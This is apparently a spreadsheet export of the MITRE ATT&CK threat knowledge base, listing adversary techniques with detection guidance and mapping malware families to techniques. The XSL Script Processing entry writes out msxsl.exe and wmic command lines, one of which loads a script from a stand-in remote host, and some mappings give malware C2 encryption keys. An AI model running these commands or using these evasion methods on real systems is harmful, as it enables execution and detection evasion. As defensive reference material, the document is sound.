    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.</t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>Valid Accounts: Local Accounts</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/003</t>
  </si>
  <si>
    <t>Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.
In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1125</t>
  </si>
  <si>
    <t>Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.</t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various means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 
Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497</t>
  </si>
  <si>
    <t>Defense Evasion, Discovery</t>
  </si>
  <si>
    <t>Virtualization, sandbox, user activity, and related discovery techniques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t>
  </si>
  <si>
    <t>Deloitte Threat Library Team; Sunny Neo</t>
  </si>
  <si>
    <t>Anti-virus, Host forensic analysis, Signature-based detection, Static File Analysis</t>
  </si>
  <si>
    <t>T1497.001</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion: System Checks</t>
  </si>
  <si>
    <t>Adversaries may employ various system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 
Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. 
Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. 
Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. 
Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/001</t>
  </si>
  <si>
    <t>06 March 2020</t>
  </si>
  <si>
    <t>Virtualization/sandbox related system checks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t>
  </si>
  <si>
    <t>Deloitte Threat Library Team</t>
  </si>
  <si>
    <t>T1497.003</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion: Time Based Evasion</t>
  </si>
  <si>
    <t>Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.
Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/003</t>
  </si>
  <si>
    <t xml:space="preserve">Time-based evasion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 </t>
  </si>
  <si>
    <t>T1497.002</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion: User Activity Based Checks</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various user activity checks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Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. 
Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/002</t>
  </si>
  <si>
    <t xml:space="preserve">User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. </t>
  </si>
  <si>
    <t>T1600</t>
  </si>
  <si>
    <t>Weaken Encryption</t>
  </si>
  <si>
    <t>Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.
Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>Encryption</t>
  </si>
  <si>
    <t>T1600.002</t>
  </si>
  <si>
    <t>Weaken Encryption: Disable Crypto Hardware</t>
  </si>
  <si>
    <t>Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600/002</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>T1600.001</t>
  </si>
  <si>
    <t>Weaken Encryption: Reduce Key Space</t>
  </si>
  <si>
    <t>Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.
Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1600/001</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.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Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102</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</si>
  <si>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Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1102.002</t>
  </si>
  <si>
    <t>Web Service: Bidirectional Communication</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/002</t>
  </si>
  <si>
    <t>T1102.001</t>
  </si>
  <si>
    <t>Web Service: Dead Drop Resolver</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.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
Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1102/001</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</si>
  <si>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User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>Web Service: One-Way Communication</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.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</si>
  <si>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https://attack.mitre.org/techniques/T1102/003</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1047</t>
  </si>
  <si>
    <t>Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>XSL Script Processing</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</si>
  <si>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 (Citation: Microsoft XSLT Script Mar 2017)
Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
* &lt;code&gt;msxsl.exe customers[.]xml script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]xsl script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]jpeg script[.]jpeg&lt;/code&gt;
Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
* Local File: &lt;code&gt;wmic process list /FORMAT:evil[.]xsl&lt;/code&gt;
* Remote File: &lt;code&gt;wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”&lt;/code&gt;</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1220</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Avneet Singh; Casey Smith; Praetorian</t>
  </si>
  <si>
    <t>source ID</t>
  </si>
  <si>
    <t>source name</t>
  </si>
  <si>
    <t>source type</t>
  </si>
  <si>
    <t>mapping type</t>
  </si>
  <si>
    <t>target ID</t>
  </si>
  <si>
    <t>target name</t>
  </si>
  <si>
    <t>target type</t>
  </si>
  <si>
    <t>mapping description</t>
  </si>
  <si>
    <t>software</t>
  </si>
  <si>
    <t>uses</t>
  </si>
  <si>
    <t>technique</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) has a command to retrieve metadata for files on disk as well as a command to list the current working directory.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>Symmetric Cryptography</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) command and control commands are encrypted within the HTTP C2 channel using the DES algorithm in CBC mode with a key derived from the MD5 hash of the string HYF54&amp;%9&amp;jkMCXuiS. [3PARA RAT](https://attack.mitre.org/software/S0066) will use an 8-byte XOR key derived from the string HYF54&amp;%9&amp;jkMCXuiS if the DES decoding fails(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) has a command to set certain attributes such as creation/modification timestamps on files.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>Web Protocols</t>
  </si>
  <si>
    <t>[3PARA RAT](https://attack.mitre.org/software/S0066) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) has the capability to obtain file and directory listings.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) has the capability to obtain a listing of running processes (including loaded modules).(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) obfuscates C2 communication using a 1-byte XOR with the key 0xBE.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) sends an OS version identifier in its beacons.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>Windows Command Shell</t>
  </si>
  <si>
    <t>[4H RAT](https://attack.mitre.org/software/S0065) has the capability to create a remote shell.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to download files from C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to identify the installed anti-virus product on the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ABK](https://attack.mitre.org/software/S0469) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>Archive via Custom Method</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) compresses output data generated by command execution with a custom implementation of the Lempel–Ziv–Welch (LZW) algorithm.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>Asymmetric Cryptography</t>
  </si>
  <si>
    <t>A variant of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts some C2 with RSA.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>Some variants of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) achieve persistence by registering the payload as a Shell Icon Overlay handler COM object.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) exfiltrates data over the same channel used for C2.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can delete files and directories.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list files and directories.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Keylogging</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can perform keylogging.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Local Data Staging</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) stores output from command execution in a .dat file in the %TEMP% directory.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is capable of setting and deleting Registry values.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is capable of starting a process using CreateProcess.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Most of the strings in [ADVSTORESHELL](https://attack.mitre.org/software/S0045) are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory.(Citation: Kaspersky Sofacy)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list connected devices.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list running processes.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can enumerate registry keys.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) achieves persistence by adding itself to the &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Rundll32</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) has used rundll32.exe in a Registry value to establish persistence.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>Standard Encoding</t>
  </si>
  <si>
    <t>C2 traffic from [ADVSTORESHELL](https://attack.mitre.org/software/S0045) is encrypted, then encoded with Base64 encoding.(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>A variant of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts some C2 with 3DES.(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can run [Systeminfo](https://attack.mitre.org/software/S0096) to gather information about the victim.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs.(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can create a remote shell and run a given command.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. The ASPXTool version used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) has been deployed to accessible servers running Internet Information Services (IIS).(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>Domain Account</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can enumerate domain users.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>Domain Groups</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can enumerate domain groups.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can gather information about organizational units (OUs) and domain trusts from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) has the ability to query Active Directory for computers.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can extract subnet information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can encrypt data with 3DES before sending it over to a C2 server.(Citation: Talos Agent Tesla Oct 2018)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can steal data from the victim’s clipboard.(Citation: Talos Agent Tesla Oct 2018)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>Credentials In Files</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to extract credentials from configuration or support files.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to steal credentials from FTP clients and wireless profiles.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>Credentials from Web Browsers</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can gather credentials from a number of browsers.(Citation: Bitdefender Agent Tesla April 2020) </t>
  </si>
  <si>
    <t>Credentials in Registry</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to extract credentials from the Registry.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>Disable or Modify Tools</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the capability to kill any running analysis processes and AV software.(Citation: Fortinet Agent Tesla June 2017)</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has routines for exfiltration over SMTP, FTP, and HTTP.(Citation: Talos Agent Tesla Oct 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: SentinelLabs Agent Tesla Aug 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
